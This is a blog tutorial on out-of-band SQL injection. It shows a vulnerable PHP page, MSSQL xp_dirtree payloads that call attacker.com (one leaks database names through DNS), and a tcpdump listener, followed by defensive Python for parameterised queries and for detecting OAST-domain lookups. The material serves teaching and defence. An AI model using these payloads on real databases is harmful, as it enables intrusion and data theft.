Thilan Dissanayaka Web App Hacking Apr 26

Out of Band SQL Injection

What is Out-of-Band (OOB) SQL Injection?

Normally in SQL Injection, the attacker:

Sees direct errors, or

Infers information through page behavior or timing.

But Out-of-Band SQL Injection is different:

OOB SQLi relies on making the vulnerable database initiate a network connection (like HTTP or DNS) to an attacker-controlled server to leak data.

This is useful when:

Errors are hidden,

No differences in page behavior,

No timing differences.

Example:

The vulnerable server sends a DNS or HTTP request to attacker.com containing database data.

How Out-of-Band SQL Injection Works

Some databases have functions that allow making external network connections:

| Database | Functions |
| --- | --- |
| MySQL | LOAD_FILE(), INTO OUTFILE, xp_dirtree() (when MySQL is linked to MSSQL) |
| Microsoft SQL Server | xp_dirtree(), xp_fileexist() |
| Oracle | UTL_HTTP.REQUEST, UTL_INADDR.GET_HOST_ADDRESS |

An attacker can exploit these features to:

Force a DNS lookup

Trigger an HTTP request

Leak data through those requests.

Real-World Example Setup

Imagine a PHP page like:

<?php
$id = $_GET['id'];
// $id is concatenated straight into the query text: this is the injection point
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
// Only the product name is echoed back; no SQL error ever reaches the user
if (mysqli_num_rows($result) > 0) {
    $row = mysqli_fetch_assoc($result);
    echo "Product Name: " . $row['name'];
}
?>

Problems:

User input is directly injected into SQL

No output-based or time-based feedback
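To make the two problems concrete, here is an added Python example (not code from the original post). It builds the query the same way the PHP above does, shows that the page's xp_dirtree probe turns into a second statement the database would have to parse, and contrasts that with a parameterised lookup in which the identical input remains a plain value. sqlite3 stands in for the MySQL/MSSQL backend, and the product rows and the OOB_PAYLOAD constant are constructed for the demonstration.

```python
import sqlite3
from typing import List, Optional, Tuple

# sqlite3 stands in for the page's MySQL/MSSQL backend; only the difference
# between building SQL text and binding a value is being demonstrated.

# Constructed input: the page's first xp_dirtree probe, used here purely as a string.
OOB_PAYLOAD = "'; EXEC master..xp_dirtree '\\\\attacker.com\\test' --"


def open_demo_db() -> sqlite3.Connection:
    """In-memory products table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id TEXT PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [("1", "Widget", 9.99), ("2", "Gadget", 19.99)],
    )
    conn.commit()
    return conn


def build_query_unsafe(product_id: str) -> str:
    """Mirror of the page's PHP: the id is pasted straight into the SQL text."""
    return f"SELECT name, price FROM products WHERE id = '{product_id}'"


def injected_statement(product_id: str) -> Optional[str]:
    """Return the extra statement smuggled in through the unsafe build, if any.

    Splitting on the first quote-semicolon pair is enough to show the effect on
    this query shape; it is a demonstration aid, not a SQL parser.
    """
    sql = build_query_unsafe(product_id)
    _head, sep, tail = sql.partition("';")
    return tail.strip() if sep else None


def lookup_safe(conn: sqlite3.Connection, product_id: str) -> List[Tuple[str, float]]:
    """Parameterised version: the SQL text is fixed and the id is bound as a value.

    Whatever the input contains, the server only ever compares it against the
    id column; it can never become part of the statement being parsed.
    """
    cur = conn.execute("SELECT name, price FROM products WHERE id = ?", (product_id,))
    return cur.fetchall()


if __name__ == "__main__":
    db = open_demo_db()
    print("unsafe SQL  :", build_query_unsafe(OOB_PAYLOAD))
    print("smuggled    :", injected_statement(OOB_PAYLOAD))
    print("safe lookup :", lookup_safe(db, OOB_PAYLOAD))
    print("normal      :", lookup_safe(db, "1"))
```

The unsafe build is the root cause of every variant on this page, blind or out-of-band: once attacker text becomes SQL, the only question left is which channel (error, timing, or an outbound DNS/HTTP request) carries the result back. With a bound parameter the probe is just an odd product id that matches no row.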

Example OOB SQL Injection Exploit

Assume the database is MSSQL Server and has access to the internet. We can use the function xp_dirtree() to trigger a network request.

Injection payload:


'; EXEC master..xp_dirtree '\\attacker.com\test' --

Full URL:

http://victim.com/product.php?id='; EXEC master..xp_dirtree '\\attacker.com\test'--

What happens?

The database server tries to list the contents of the share \\attacker.com\test

A DNS lookup happens for attacker.com

The attacker sees the request and knows the SQL injection worked!

Another Example: Leaking Data

You can even exfiltrate data!

Example payload:

'; EXEC master..xp_dirtree '\\' + (SELECT TOP 1 name FROM master..sysdatabases) + '.attacker.com\abc' --

If the first database name is 'testdb', the database server will try to access:

testdb.attacker.com

If you monitor your domain’s DNS logs, you can see the database name!

Setting Up the Attacker's Server

You need to set up:

A DNS listener (example: using tcpdump, dnsmasq, Burp Collaborator, or Interactsh)

Or a web server to catch HTTP requests.

A simple way, using tcpdump to catch DNS queries:

sudo tcpdump -i eth0 port 53

Or use public services like:

Interactsh (by Project Discovery)

Burp Collaborator client

They give you a domain like random.oastify.com, and log incoming requests.
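The same DNS traffic that tells a tester the injection worked is what a defender should be watching for, so here is an added Python example (not code from the original post) that turns the page's two observations into detection logic: a database server has no business resolving names outside its own allow-list, and any lookup of a known out-of-band testing (OAST) domain such as oastify.com means a probe like the ones above is in flight. The BIND-style query-log lines, the DB_SERVERS set, the ALLOWED_INTERNAL_SUFFIXES tuple and the OAST_SUFFIXES starter list are all constructed or assumed for the demonstration.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constructed sample: BIND-style query-log lines. 10.0.5.21 plays the SQL Server host.
SAMPLE_LOG = """\
12-May-2025 10:14:02.113 client 10.0.5.21#49231: query: products-api.internal.example IN A +
12-May-2025 10:14:05.771 client 10.0.5.21#49240: query: testdb.attacker.com IN A +
12-May-2025 10:14:06.002 client 10.0.5.21#49241: query: attacker.com IN A +
12-May-2025 10:14:09.540 client 10.0.8.14#50112: query: cx1k9d2q.oastify.com IN A +
12-May-2025 10:15:00.001 client 10.0.9.3#44100: query: wsus.internal.example IN A +
""".splitlines()

# Assumed inventory: addresses of database servers, and the only DNS suffixes
# they have a legitimate reason to resolve. Adjust both to your environment.
DB_SERVERS = {"10.0.5.21", "10.0.5.22"}
ALLOWED_INTERNAL_SUFFIXES = ("internal.example",)

# Starter list of OAST provider domains: oastify.com is the one the page names,
# the rest are Burp Collaborator / Interactsh defaults. Extend from your own intel.
OAST_SUFFIXES = ("oastify.com", "burpcollaborator.net", "interact.sh", "oast.fun", "oast.me")

QUERY_RE = re.compile(r"client (?P<ip>[\d.]+)#\d+: query: (?P<name>\S+) IN (?P<qtype>\S+)")


@dataclass(frozen=True)
class DnsQuery:
    client: str
    name: str
    qtype: str


@dataclass(frozen=True)
class Alert:
    rule: str
    client: str
    name: str
    leaked_label: Optional[str]  # leftmost labels: the part an attacker chooses per query


def parse_query_log(lines: Iterable[str]) -> List[DnsQuery]:
    """Extract (client, name, type) from each log line; lines that do not match are skipped."""
    queries = []
    for line in lines:
        m = QUERY_RE.search(line)
        if m:
            queries.append(DnsQuery(m["ip"], m["name"].rstrip(".").lower(), m["qtype"]))
    return queries


def _under(name: str, suffixes: Iterable[str]) -> bool:
    return any(name == s or name.endswith("." + s) for s in suffixes)


def _leaked_label(name: str) -> Optional[str]:
    """Everything left of the registrable domain, approximated as the last two labels.

    Fine for attacker.com-style names; use a public-suffix list if you must
    handle names like example.co.uk correctly.
    """
    labels = name.split(".")
    return ".".join(labels[:-2]) or None


def analyse(lines: Iterable[str], db_servers=DB_SERVERS,
            allowed=ALLOWED_INTERNAL_SUFFIXES) -> List[Alert]:
    """Flag DNS lookups matching the two OOB-SQLi indicators described on the page."""
    alerts = []
    for q in parse_query_log(lines):
        # 1. Anyone resolving a known OAST provider domain: a probe is being run.
        if _under(q.name, OAST_SUFFIXES):
            alerts.append(Alert("oast-domain", q.client, q.name, _leaked_label(q.name)))
        # 2. A database server resolving anything outside its allow-list: xp_dirtree
        #    UNC paths and UTL_HTTP/UTL_INADDR calls all begin with exactly this lookup.
        if q.client in db_servers and not _under(q.name, allowed):
            alerts.append(Alert("db-server-external-lookup", q.client, q.name,
                                _leaked_label(q.name)))
    return alerts


if __name__ == "__main__":
    for a in analyse(SAMPLE_LOG):
        print(f"[{a.rule}] {a.client} -> {a.name} (possible leaked data: {a.leaked_label})")
```

Rule 2 is the one worth deploying first: it needs no signature list, and a hit carries the exfiltrated label with it (here "testdb"), which is exactly the value the attacker was hoping to read from their own DNS logs. Pair it with an egress policy that denies database hosts outbound DNS and SMB to the internet, so the lookup never leaves the network in the first place.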
